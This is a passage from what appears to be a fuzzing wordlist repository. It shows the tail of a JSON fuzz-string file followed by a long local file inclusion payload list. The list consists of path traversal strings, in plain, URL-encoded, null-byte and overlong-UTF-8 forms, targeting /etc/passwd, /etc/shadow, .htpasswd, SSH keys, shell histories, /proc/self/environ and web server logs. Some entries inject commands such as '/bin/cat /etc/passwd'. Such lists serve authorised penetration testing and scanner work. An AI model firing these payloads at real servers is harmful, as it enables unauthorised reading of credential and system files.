"\u0100\u0101\u0102\u0103\u0104\u0105\u0106\u0107\u0108\u0109\u010a\u010b\u010c\u010d\u010e\u010f\u0110\u0111\u0112\u0113\u0114\u0115\u0116\u0117\u0118\u0119\u011a\u011b\u011c\u011d\u011e\u011f\u0120\u0121\u0122\u0123\u0124\u0125\u0126\u0127\u0128\u0129\u012a\u012b\u012c\u012d\u012e\u012f\u0130\u0131\u0132\u0133\u0134\u0135\u0136\u0137\u0138\u0139\u013a\u013b\u013c\u013d\u013e\u013f\u0140\u0141\u0142\u0143\u0144\u0145\u0146\u0147\u0148\u0149\u014a\u014b\u014c\u014d\u014e\u014f\u0150\u0151\u0152\u0153\u0154\u0155\u0156\u0157\u0158\u0159\u015a\u015b\u015c\u015d\u015e\u015f\u0160\u0161\u0162\u0163\u0164\u0165\u0166\u0167\u0168\u0169\u016a\u016b\u016c\u016d\u016e\u016f\u0170\u0171\u0172\u0173\u0174\u0175\u0176\u0177\u0178\u0179\u017a\u017b\u017c\u017d\u017e\u017f\u0180\u0181\u0182\u0183\u0184\u0185\u0186\u0187\u0188\u0189\u018a\u018b\u018c\u018d\u018e\u018f\u0190\u0191\u0192\u0193\u0194\u0195\u0196\u0197\u0198\u0199\u019a\u019b\u019c\u019d\u019e\u019f\u01a0\u01a1\u01a2\u01a3\u01a4\u01a5\u01a6\u01a7\u01a8\u01a9\u01aa\u01ab\u01ac\u01ad\u01ae\u01af\u01b0\u01b1\u01b2\u01b3\u01b4\u01b5\u01b6\u01b7\u01b8\u01b9\u01ba\u01bb\u01bc\u01bd\u01be\u01bf\u01c0\u01c1\u01c2\u01c3\u01c4\u01c5\u01c6\u01c7\u01c8\u01c9\u01ca\u01cb\u01cc\u01cd\u01ce\u01cf\u01d0\u01d1\u01d2\u01d3\u01d4\u01d5\u01d6\u01d7\u01d8\u01d9\u01da\u01db\u01dc\u01dd\u01de\u01df\u01e0\u01e1\u01e2\u01e3\u01e4\u01e5\u01e6\u01e7\u01e8\u01e9\u01ea\u01eb\u01ec\u01ed\u01ee\u01ef\u01f0\u01f1\u01f2\u01f3\u01f4\u01f5\u01f6\u01f7\u01f8\u01f9\u01fa\u01fb\u01fc\u01fd\u01fe\u01ff\u0200\u0201\u0202\u0203\u0204\u0205\u0206\u0207\u0208\u0209\u020a\u020b\u020c\u020d\u020e\u020f\u0210\u0211\u0212\u0213\u0214\u0215\u0216\u0217\u0218\u0219\u021a\u021b\u021c\u021d\u021e\u021f\u0220\u0221\u0222\u0223\u0224\u0225\u0226\u0227\u0228\u0229\u022a\u022b\u022c\u022d\u022e\u022f\u0230\u0231\u0232\u0233\u0234\u0235\u0236\u0237\u0238\u0239\u023a\u023b\u023c\u023d\u023e\u023f\u0240\u0241\u0242\u0243\u0244\u0245\u0246\u0247\u0248\u0249\u024a\u024b\u024c\u024d\u024e\u024f\u0250\u0251\u0252\u0253\u0254\u0255\u0256\u0257\u0258\u0259\u025a\u025b\u025c\u025d\u025e\u025f\u0260\u0261\u0262\u0263\u0264\u0265\u0266\u0267\u0268\u0269\u026a\u026b\u026c\u026d\u026e\u026f\u0270\u0271\u0272\u0273\u0274\u0275\u0276\u0277\u0278\u0279\u027a\u027b\u027c\u027d\u027e\u027f\u0280\u0281\u0282\u0283\u0284\u0285\u0286\u0287\u0288\u0289\u028a\u028b\u028c\u028d\u028e\u028f\u0290\u0291\u0292\u0293\u0294\u0295\u0296\u0297\u0298\u0299\u029a\u029b\u029c\u029d\u029e\u029f\u02a0\u02a1\u02a2\u02a3\u02a4\u02a5\u02a6\u02a7\u02a8\u02a9\u02aa\u02ab\u02ac\u02ad\u02ae\u02af\u02b0\u02b1\u02b2\u02b3\u02b4\u02b5\u02b6\u02b7\u02b8\u02b9\u02ba\u02bb\u02bc\u02bd\u02be\u02bf\u02c0\u02c1\u02c2\u02c3\u02c4\u02c5\u02c6\u02c7\u02c8\u02c9\u02ca\u02cb\u02cc\u02cd\u02ce\u02cf\u02d0\u02d1\u02d2\u02d3\u02d4\u02d5\u02d6\u02d7\u02d8\u02d9\u02da\u02db\u02dc\u02dd\u02de\u02df\u02e0\u02e1\u02e2\u02e3\u02e4\u02e5\u02e6\u02e7\u02e8\u02e9\u02ea\u02eb\u02ec\u02ed\u02ee\u02ef\u02f0\u02f1\u02f2\u02f3\u02f4\u02f5\u02f6\u02f7\u02f8\u02f9\u02fa\u02fb\u02fc\u02fd\u02fe\u02ff" 80 | "\"\\/Date(1335205592410)\\/\"" 81 | "\"\\/Date(-1)\\/\"" 82 | "\"\\/Date(1335205592410-0500)\\/\"" 83 | "2012-04-23T18:25:43.511Z" 84 | "2012-04-21T18:25:43-05:00" 85 | "Date(1335205592410)" 86 | "new Date(1335205592410)" 87 | eval("while(1);") 88 | [,,,,] 89 | null 90 | -------------------------------------------------------------------------------- /LFI/JHADDIX_LFI.txt: -------------------------------------------------------------------------------- 1 | /.../.../.../.../.../ 2 | \…..\\\…..\\\…..\\\ 3 | %00../../../../../../etc/passwd 4 | %00/etc/passwd%00 5 | %00../../../../../../etc/shadow 6 | %00/etc/shadow%00 7 | %0a/bin/cat%20/etc/passwd 8 | %0a/bin/cat%20/etc/shadow 9 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 10 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 11 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 12 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini 13 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 14 | /../../../../../../../../%2A 15 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini 16 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 17 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 18 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 19 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow 20 | ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed 21 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 22 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow 23 | =3D “/..” . “%2f.. 24 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 25 | admin/access_log 26 | /admin/install.php 27 | ../../../administrator/inbox 28 | /apache2/logs/access_log 29 | /apache2/logs/access.log 30 | /apache2/logs/error_log 31 | /apache2/logs/error.log 32 | /apache/logs/access_log 33 | /apache/logs/access.log 34 | ../../../../../apache/logs/access.log 35 | ../../../../apache/logs/access.log 36 | ../../../apache/logs/access.log 37 | ../../apache/logs/access.log 38 | ../apache/logs/access.log 39 | /apache/logs/error_log 40 | /apache/logs/error.log 41 | ../../../../../apache/logs/error.log 42 | ../../../../apache/logs/error.log 43 | ../../../apache/logs/error.log 44 | ../../apache/logs/error.log 45 | ../apache/logs/error.log 46 | /apache\php\php.ini 47 | \\'/bin/cat%20/etc/passwd\\' 48 | \\'/bin/cat%20/etc/shadow\\' 49 | /.bash_history 50 | /.bash_profile 51 | /.bashrc 52 | /../../../../../../../../bin/id| 53 | /bin/php.ini 54 | /boot/grub/grub.conf 55 | /./././././././././././boot.ini 56 | /../../../../../../../../../../../boot.ini 57 | /..\../..\../..\../..\../..\../..\../boot.ini 58 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 59 | ..//..//..//..//..//boot.ini 60 | ../../../../../../../../../../../../boot.ini 61 | ../../boot.ini 62 | ..\../..\../..\../..\../boot.ini 63 | ..\../..\../boot.ini 64 | ..\..\..\..\..\..\..\..\..\..\boot.ini 65 | \..\..\..\..\..\..\..\..\..\..\boot.ini 66 | /../../../../../../../../../../../boot.ini%00 67 | ../../../../../../../../../../../../boot.ini%00 68 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 69 | /../../../../../../../../../../../boot.ini%00.html 70 | /../../../../../../../../../../../boot.ini%00.jpg 71 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 72 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 73 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 74 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 75 | c:\apache\logs\access.log 76 | c:\apache\logs\error.log 77 | c:\AppServ\MySQL 78 | C:/boot.ini 79 | C:\boot.ini 80 | /C:/inetpub/ftproot/ 81 | C:/inetpub/wwwroot/global.asa 82 | C:\inetpub\wwwroot\global.asa 83 | c:\inetpub\wwwroot\index.asp 84 | /config.asp 85 | ../config.asp 86 | config.asp 87 | ../config.inc.php 88 | config.inc.php 89 | ../config.js 90 | config.js 91 | _config.php 92 | ../_config.php 93 | ../config.php 94 | config.php 95 | ../_config.php%00 96 | ../../../../../../../../conf/server.xml 97 | /core/config.php 98 | /C:\Program Files\ 99 | c:\Program Files\Apache Group\Apache\logs\access.log 100 | c:\Program Files\Apache Group\Apache\logs\error.log 101 | /.cshrc 102 | c:\System32\Inetsrv\metabase.xml 103 | c:WINDOWS/system32/ 104 | d:\AppServ\MySQL 105 | database.asp 106 | database.js 107 | database.php 108 | data.php 109 | dbase.php a 110 | db.php 111 | ../../../../../../../dev 112 | /D:\Program Files\ 113 | d:\System32\Inetsrv\metabase.xml 114 | /etc/apache2/apache2.conf 115 | /etc/apache2/conf/httpd.conf 116 | /etc/apache2/httpd.conf 117 | /etc/apache2/sites-available/default 118 | /etc/apache2/vhosts.d/default_vhost.include 119 | /etc/apache/apache.conf 120 | /etc/apache/conf/httpd.conf 121 | /etc/apache/httpd.conf 122 | /etc/apt/sources.list 123 | /etc/chrootUsers 124 | /etc/crontab 125 | /etc/defaultdomain 126 | /etc/default/passwd 127 | /etc/defaultrouter 128 | /etc/fstab 129 | /etc/ftpchroot 130 | /etc/ftphosts 131 | /etc/group 132 | /etc/hostname.bge 133 | /etc/hostname.ce0 134 | /etc/hostname.ce1 135 | /etc/hostname.ce2 136 | /etc/hostname.ce3 137 | /etc/hostname.dcelx0 138 | /etc/hostname.dcelx1 139 | /etc/hostname.dcelx2 140 | /etc/hostname.dcelx3 141 | /etc/hostname.dmfe0 142 | /etc/hostname.dmfe1 143 | /etc/hostname.dmfe2 144 | /etc/hostname.dmfe3 145 | /etc/hostname.dnet0 146 | /etc/hostname.dnet1 147 | /etc/hostname.dnet2 148 | /etc/hostname.dnet3 149 | /etc/hostname.ecn0 150 | /etc/hostname.ecn1 151 | /etc/hostname.ecn2 152 | /etc/hostname.ecn3 153 | /etc/hostname.elx0 154 | /etc/hostname.elx1 155 | /etc/hostname.elx2 156 | /etc/hostname.elx3 157 | /etc/hostname.elxl0 158 | /etc/hostname.elxl1 159 | /etc/hostname.elxl2 160 | /etc/hostname.elxl3 161 | /etc/hostname.eri0 162 | /etc/hostname.eri1 163 | /etc/hostname.eri2 164 | /etc/hostname.eri3 165 | /etc/hostname.ge0 166 | /etc/hostname.ge1 167 | /etc/hostname.ge2 168 | /etc/hostname.ge3 169 | /etc/hostname.hme0 170 | /etc/hostname.hme1 171 | /etc/hostname.hme2 172 | /etc/hostname.hme3 173 | /etc/hostname.ieef0 174 | /etc/hostname.ieef1 175 | /etc/hostname.ieef2 176 | /etc/hostname.ieef3 177 | /etc/hostname.iprb0 178 | /etc/hostname.iprb1 179 | /etc/hostname.iprb2 180 | /etc/hostname.iprb3 181 | /etc/hostname.le0 182 | /etc/hostname.le1 183 | /etc/hostname.le2 184 | /etc/hostname.le3 185 | /etc/hostname.lo 186 | /etc/hostname.pcn0 187 | /etc/hostname.pcn1 188 | /etc/hostname.pcn2 189 | /etc/hostname.pcn3 190 | /etc/hostname.qfe0 191 | /etc/hostname.qfe1 192 | /etc/hostname.qfe2 193 | /etc/hostname.qfe3 194 | /etc/hostname.spwr0 195 | /etc/hostname.spwr1 196 | /etc/hostname.spwr2 197 | /etc/hostname.spwr3 198 | /etc/hosts 199 | ../../../../../../../../../../../../etc/hosts 200 | ../../../../../../../../../../../../etc/hosts%00 201 | /etc/hosts.allow 202 | /etc/hosts.deny 203 | /etc/hosts.equiv 204 | /etc/http/conf/httpd.conf 205 | /etc/httpd.conf 206 | /etc/httpd/conf.d/php.conf 207 | /etc/httpd/conf.d/squirrelmail.conf 208 | /etc/httpd/conf.d/ssl.conf 209 | /etc/httpd/conf/httpd.conf 210 | /etc/httpd/httpd.conf 211 | /etc/httpd/logs/acces_log 212 | /etc/httpd/logs/acces.log 213 | ../../../../../../../etc/httpd/logs/acces_log 214 | ../../../../../../../etc/httpd/logs/acces.log 215 | /etc/httpd/logs/access_log 216 | /etc/httpd/logs/access.log 217 | ../../../../../etc/httpd/logs/access_log 218 | ../../../../../etc/httpd/logs/access.log 219 | /etc/httpd/logs/error_log 220 | /etc/httpd/logs/error.log 221 | ../../../../../../../etc/httpd/logs/error_log 222 | ../../../../../../../etc/httpd/logs/error.log 223 | ../../../../../etc/httpd/logs/error_log 224 | ../../../../../etc/httpd/logs/error.log 225 | /etc/httpd/php.ini 226 | /etc/http/httpd.conf 227 | /etc/inetd.conf 228 | /etc/init.d/apache 229 | /etc/init.d/apache2 230 | /etc/issue 231 | /etc/logrotate.d/ftp 232 | /etc/logrotate.d/httpd 233 | /etc/logrotate.d/proftpd 234 | /etc/logrotate.d/vsftpd.log 235 | /etc/mail/access 236 | /etc/mailman/mm_cfg.py 237 | /etc/make.conf 238 | /etc/master.passwd 239 | /etc/motd 240 | /etc/my.cnf 241 | /etc/mysql/my.cnf 242 | /etc/netconfig 243 | /etc/nsswitch.conf 244 | /etc/opt/ipf/ipf.conf 245 | /etc/opt/ipf/ipnat.conf 246 | /./././././././././././etc/passwd 247 | /../../../../../../../../../../etc/passwd 248 | /../../../../../../../../../../etc/passwd^^ 249 | /..\../..\../..\../..\../..\../..\../etc/passwd 250 | /etc/passwd 251 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd 252 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd 253 | ../../../../../../../../../../../../../../../../../../../../etc/passwd 254 | ../../../../../../../../../../../../../../../../../../../etc/passwd 255 | ../../../../../../../../../../../../../../../../../../etc/passwd 256 | ../../../../../../../../../../../../../../../../../etc/passwd 257 | ../../../../../../../../../../../../../../../../etc/passwd 258 | ../../../../../../../../../../../../../../../etc/passwd 259 | ../../../../../../../../../../../../../../etc/passwd 260 | ../../../../../../../../../../../../../etc/passwd 261 | ../../../../../../../../../../../../etc/passwd 262 | ../../../../../../../../../../../etc/passwd 263 | ../../../../../../../../../../etc/passwd 264 | ../../../../../../../../../etc/passwd 265 | ../../../../../../../../etc/passwd 266 | ../../../../../../../etc/passwd 267 | ../../../../../../etc/passwd 268 | ../../../../../etc/passwd 269 | ../../../../etc/passwd 270 | ../../../etc/passwd 271 | ../../etc/passwd 272 | ../etc/passwd 273 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 274 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 275 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 276 | etc/passwd 277 | /etc/passwd%00 278 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 279 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 280 | ../../../../../../../../../../../../../../../../../../../../etc/passwd%00 281 | ../../../../../../../../../../../../../../../../../../../etc/passwd%00 282 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 283 | ../../../../../../../../../../../../../../../../../etc/passwd%00 284 | ../../../../../../../../../../../../../../../../etc/passwd%00 285 | ../../../../../../../../../../../../../../../etc/passwd%00 286 | ../../../../../../../../../../../../../../etc/passwd%00 287 | ../../../../../../../../../../../../../etc/passwd%00 288 | ../../../../../../../../../../../../etc/passwd%00 289 | ../../../../../../../../../../../etc/passwd%00 290 | ../../../../../../../../../../etc/passwd%00 291 | ../../../../../../../../../etc/passwd%00 292 | ../../../../../../../../etc/passwd%00 293 | ../../../../../../../etc/passwd%00 294 | ../../../../../../etc/passwd%00 295 | ../../../../../etc/passwd%00 296 | ../../../../etc/passwd%00 297 | ../../../etc/passwd%00 298 | ../../etc/passwd%00 299 | ../etc/passwd%00 300 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 301 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 302 | /../../../../../../../../../../../etc/passwd%00.html 303 | /../../../../../../../../../../../etc/passwd%00.jpg 304 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 305 | /etc/php4.4/fcgi/php.ini 306 | /etc/php4/apache2/php.ini 307 | /etc/php4/apache/php.ini 308 | /etc/php4/cgi/php.ini 309 | /etc/php5/apache2/php.ini 310 | /etc/php5/apache/php.ini 311 | /etc/php5/cgi/php.ini 312 | /etc/php/apache2/php.ini 313 | /etc/php/apache/php.ini 314 | /etc/php/cgi/php.ini 315 | /etc/php.d/dom.ini 316 | /etc/php.d/gd.ini 317 | /etc/php.d/imap.ini 318 | /etc/php.d/json.ini 319 | /etc/php.d/ldap.ini 320 | /etc/php.d/mbstring.ini 321 | /etc/php.d/mysqli.ini 322 | /etc/php.d/mysql.ini 323 | /etc/php.d/odbc.ini 324 | /etc/php.d/pdo.ini 325 | /etc/php.d/pdo_mysql.ini 326 | /etc/php.d/pdo_odbc.ini 327 | /etc/php.d/pdo_pgsql.ini 328 | /etc/php.d/pdo_sqlite.ini 329 | /etc/php.d/pgsql.ini 330 | /etc/php.d/xmlreader.ini 331 | /etc/php.d/xmlwriter.ini 332 | /etc/php.d/xsl.ini 333 | /etc/php.d/zip.ini 334 | /etc/php.ini 335 | /etc/php/php4/php.ini 336 | /etc/php/php.ini 337 | /etc/postfix/mydomains 338 | /etc/proftp.conf 339 | /etc/proftpd/modules.conf 340 | /etc/protpd/proftpd.conf 341 | /etc/pure-ftpd.conf 342 | /etc/pureftpd.passwd 343 | /etc/pureftpd.pdb 344 | /etc/pure-ftpd/pure-ftpd.conf 345 | /etc/pure-ftpd/pure-ftpd.pdb 346 | /etc/pure-ftpd/pureftpd.pdb 347 | /etc/release 348 | /etc/resolv.conf 349 | /etc/rpc 350 | /etc/security/environ 351 | /etc/security/failedlogin 352 | /etc/security/group 353 | /etc/security/lastlog 354 | /etc/security/limits 355 | /etc/security/passwd 356 | /etc/security/user 357 | /./././././././././././etc/shadow 358 | /../../../../../../../../../../etc/shadow 359 | /../../../../../../../../../../etc/shadow^^ 360 | /..\../..\../..\../..\../..\../..\../etc/shadow 361 | /etc/shadow 362 | ../../../../../../../../../../../../etc/shadow 363 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 364 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 365 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 366 | ../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 367 | ../../../../../../../../../../../../etc/shadow%00 368 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 369 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 370 | etc/shadow%00 371 | /etc/ssh/sshd_config 372 | /etc/sudoers 373 | /etc/syslog.conf 374 | /etc/syslogd.conf 375 | /etc/system 376 | /etc/updatedb.conf 377 | /etc/utmp 378 | /etc/vfstab 379 | /etc/vhcs2/proftpd/proftpd.conf 380 | /etc/vsftpd.chroot_list 381 | /etc/vsftpd.conf 382 | /etc/vsftpd/vsftpd.conf 383 | /etc/wtmp 384 | /etc/wu-ftpd/ftpaccess 385 | /etc/wu-ftpd/ftphosts 386 | /etc/wu-ftpd/ftpusers 387 | /.forward 388 | /home2\bin\stable\apache\php.ini 389 | /home/apache/conf/httpd.conf 390 | /home/apache/httpd.conf 391 | /home\bin\stable\apache\php.ini 392 | /.htpasswd 393 | .htpasswd 394 | ../.htpasswd 395 | ../install.php 396 | install.php 397 | ../../../../../../../../../../../../localstart.asp 398 | ../../../../../../../../../../../../localstart.asp%00 399 | /log/miscDir/accesslog 400 | /.logout 401 | /logs/access_log 402 | /logs/access.log 403 | ../../../../../logs/access.log 404 | ../../../../logs/access.log 405 | ../../../logs/access.log 406 | ../../logs/access.log 407 | ../logs/access.log 408 | /logs/error_log 409 | /logs/error.log 410 | ../../../../../logs/error.log 411 | ../../../../logs/error.log 412 | ../../../logs/error.log 413 | ../../logs/error.log 414 | ../logs/error.log 415 | /logs/pure-ftpd.log 416 | /master.passwd 417 | member/.htpasswd 418 | members/.htpasswd 419 | /.netrc 420 | /NetServer\bin\stable\apache\php.ini 421 | /opt/apache2/conf/httpd.conf 422 | /opt/apache/conf/httpd.conf 423 | /opt/lampp/logs/access_log 424 | /opt/lampp/logs/access.log 425 | /opt/lampp/logs/error_log 426 | /opt/lampp/logs/error.log 427 | /opt/xampp/etc/php.ini 428 | /opt/xampp/logs/access_log 429 | /opt/xampp/logs/access.log 430 | /opt/xampp/logs/error_log 431 | /opt/xampp/logs/error.log 432 | .pass 433 | ../.pass 434 | pass.dat 435 | passwd 436 | /.passwd 437 | .passwd 438 | ../.passwd 439 | passwd.dat 440 | /php4\php.ini 441 | /php5\php.ini 442 | /php\php.ini 443 | /PHP\php.ini 444 | /private/etc/httpd/httpd.conf 445 | /private/etc/httpd/httpd.conf.default 446 | /proc/cpuinfo 447 | /proc/interrupts 448 | /proc/loadavg 449 | /proc/meminfo 450 | /proc/mounts 451 | /proc/net/arp 452 | /proc/net/dev 453 | /proc/net/route 454 | /proc/net/tcp 455 | /proc/partitions 456 | /proc/self/cmdline 457 | /proc/self/envron 458 | /proc/version 459 | /.profile 460 | /Program Files\Apache Group\Apache2\conf\httpd.conf 461 | /Program Files\Apache Group\Apache\conf\httpd.conf 462 | /Program Files\Apache Group\Apache\logs\access.log 463 | /Program Files\Apache Group\Apache\logs\error.log 464 | /Program Files\xampp\apache\conf\httpd.conf 465 | /../../../../pswd 466 | /.rhosts 467 | /root/.bash_history 468 | /root/.bash_logut 469 | root/.htpasswd 470 | /root/.ksh_history 471 | /root/.Xauthority 472 | /.sh_history 473 | /.shosts 474 | /.ssh/authorized_keys 475 | user/.htpasswd 476 | ../users.db.php 477 | users.db.php 478 | users/.htpasswd 479 | /usr/apache2/conf/httpd.conf 480 | /usr/apache/conf/httpd.conf 481 | /usr/etc/pure-ftpd.conf 482 | /usr/lib/cron/log 483 | /usr/lib/php.ini 484 | /usr/lib/php/php.ini 485 | /usr/lib/security/mkuser.default 486 | /usr/local/apache2/conf/httpd.conf 487 | /usr/local/apache2/httpd.conf 488 | /usr/local/apache2/logs/access_log 489 | /usr/local/apache2/logs/access.log 490 | /usr/local/apache2/logs/error_log 491 | /usr/local/apache2/logs/error.log 492 | /usr/local/apache/conf/httpd.conf 493 | /usr/local/apache/conf/php.ini 494 | /usr/local/apache/httpd.conf 495 | /usr/local/apache/log 496 | /usr/local/apache/logs 497 | /usr/local/apache/logs/access_log 498 | /usr/local/apache/logs/access_ log 499 | /usr/local/apache/logs/access.log 500 | /usr/local/apache/logs/access. log 501 | ../../../../../../../usr/local/apache/logs/access_ log 502 | ../../../../../../../usr/local/apache/logs/access. log 503 | ../../../../../usr/local/apache/logs/access_log 504 | ../../../../../usr/local/apache/logs/access.log 505 | /usr/local/apache/logs/error_log 506 | /usr/local/apache/logs/error.log 507 | ../../../../../../../usr/local/apache/logs/error_l og 508 | ../../../../../../../usr/local/apache/logs/error.l og 509 | ../../../../../usr/local/apache/logs/error_log 510 | ../../../../../usr/local/apache/logs/error.log 511 | /usr/local/apps/apache2/conf/httpd.conf 512 | /usr/local/apps/apache/conf/httpd.conf 513 | /usr/local/cpanel/logs 514 | /usr/local/cpanel/logs/access_log 515 | /usr/local/cpanel/logs/error_log 516 | /usr/local/cpanel/logs/license_log 517 | /usr/local/cpanel/logs/login_log 518 | /usr/local/cpanel/logs/stats_log 519 | /usr/local/etc/apache2/conf/httpd.conf 520 | /usr/local/etc/apache/conf/httpd.conf 521 | /usr/local/etc/apache/vhosts.conf 522 | /usr/local/etc/httpd/conf/httpd.conf 523 | /usr/local/etc/httpd/logs/access_log 524 | /usr/local/etc/httpd/logs/error_log 525 | /usr/local/etc/php.ini 526 | /usr/local/etc/pure-ftpd.conf 527 | /usr/local/etc/pureftpd.pdb 528 | /usr/local/httpd/conf/httpd.conf 529 | /usr/local/lib/php.ini 530 | /usr/local/php4/httpd.conf 531 | /usr/local/php4/httpd.conf.php 532 | /usr/local/php4/lib/php.ini 533 | /usr/local/php5/httpd.conf 534 | /usr/local/php5/httpd.conf.php 535 | /usr/local/php5/lib/php.ini 536 | /usr/local/php/httpd.conf 537 | /usr/local/php/httpd.conf.php 538 | /usr/local/php/lib/php.ini 539 | /usr/local/pureftpd/etc/pure-ftpd.conf 540 | /usr/local/pureftpd/etc/pureftpd.pdb 541 | /usr/local/pureftpd/sbin/pure-config.pl 542 | /usr/local/www/logs/thttpd_log 543 | /usr/local/Zend/etc/php.ini 544 | /usr/pkgsrc/net/pureftpd/ 545 | /usr/ports/contrib/pure-ftpd/ 546 | /usr/ports/ftp/pure-ftpd/ 547 | /usr/ports/net/pure-ftpd/ 548 | /usr/sbin/pure-config.pl 549 | /usr/spool/lp/log 550 | /usr/spool/mqueue/syslog 551 | /var/adm 552 | /var/adm/acct/sum/loginlog 553 | /var/adm/aculog 554 | /var/adm/aculogs 555 | /var/adm/crash/unix 556 | /var/adm/crash/vmcore 557 | /var/adm/cron/log 558 | /var/adm/dtmp 559 | /var/adm/lastlog 560 | /var/adm/lastlog/username 561 | /var/adm/log/asppp.log 562 | /var/adm/loginlog 563 | /var/adm/log/xferlog 564 | /var/adm/lp/lpd-errs 565 | /var/adm/messages 566 | /var/adm/pacct 567 | /var/adm/qacct 568 | /var/adm/ras/bootlog 569 | /var/adm/ras/errlog 570 | /var/adm/sulog 571 | /var/adm/SYSLOG 572 | /var/adm/utmp 573 | /var/adm/utmpx 574 | /var/adm/vold.log 575 | /var/adm/wtmp 576 | /var/adm/wtmpx 577 | /var/adm/X0msgs 578 | /var/apache/log 579 | /var/apache/logs 580 | /var/apache/logs/access_log 581 | /var/apache/logs/error_log 582 | /var/cpanel/cpanel.config 583 | /var/cron/log 584 | /var/lib/mlocate/mlocate.db 585 | /var/lib/mysql/my.cnf 586 | /var/local/www/conf/php.ini 587 | /var/lock/samba 588 | /var/log 589 | /var/log/access_log 590 | /var/log/access.log 591 | ../../../../../../../var/log/access_log 592 | ../../../../../../../var/log/access.log 593 | ../../../../../var/log/access_log 594 | /var/log/acct 595 | /var/log/apache2/access_log 596 | /var/log/apache2/access.log 597 | ../../../../../../../var/log/apache2/access_log 598 | ../../../../../../../var/log/apache2/access.log 599 | /var/log/apache2/error_log 600 | /var/log/apache2/error.log 601 | ../../../../../../../var/log/apache2/error_log 602 | ../../../../../../../var/log/apache2/error.log 603 | /var/log/apache/access_log 604 | /var/log/apache/access.log 605 | ../../../../../../../var/log/apache/access_log 606 | ../../../../../../../var/log/apache/access.log 607 | ../../../../../var/log/apache/access_log 608 | ../../../../../var/log/apache/access.log 609 | /var/log/apache/error_log 610 | /var/log/apache/error.log 611 | ../../../../../../../var/log/apache/error_log 612 | ../../../../../../../var/log/apache/error.log 613 | ../../../../../var/log/apache/error_log 614 | ../../../../../var/log/apache/error.log 615 | /var/log/apache-ssl/access.log 616 | /var/log/apache-ssl/error.log 617 | /var/log/auth 618 | /var/log/authlog 619 | /var/log/auth.log 620 | /var/log/boot.log 621 | /var/log/cron.log 622 | /var/log/dmesg 623 | /var/log/error_log 624 | /var/log/error.log 625 | ../../../../../../../var/log/error_log 626 | ../../../../../../../var/log/error.log 627 | ../../../../../var/log/error_log 628 | /var/log/exim_mainlog 629 | /var/log/exim/mainlog 630 | /var/log/exim_paniclog 631 | /var/log/exim/paniclog 632 | /var/log/exim_rejectlog 633 | /var/log/exim/rejectlog 634 | /var/log/ftplog 635 | /var/log/ftp-proxy 636 | /var/log/ftp-proxy/ftp-proxy.log 637 | /var/log/httpd/ 638 | /var/log/httpd/access_log 639 | /var/log/httpd/access.log 640 | ../../../../../var/log/httpd/access_log 641 | /var/log/httpd/error_log 642 | /var/log/httpd/error.log 643 | ../../../../../var/log/httpd/error_log 644 | /var/log/httpsd/ssl.access_log 645 | /var/log/httpsd/ssl_log 646 | /var/log/kern.log 647 | /var/log/lastlog 648 | /var/log/lighttpd 649 | /var/log/maillog 650 | /var/log/message 651 | /var/log/messages 652 | /var/log/mysqlderror.log 653 | /var/log/mysqld.log 654 | /var/log/mysql.log 655 | /var/log/mysql/mysql-bin.log 656 | /var/log/mysql/mysql.log 657 | /var/log/mysql/mysql-slow.log 658 | /var/log/ncftpd.errs 659 | /var/log/ncftpd/misclog.txt 660 | /var/log/news 661 | /var/log/news.all 662 | /var/log/news/news 663 | /var/log/news/news.all 664 | /var/log/news/news.crit 665 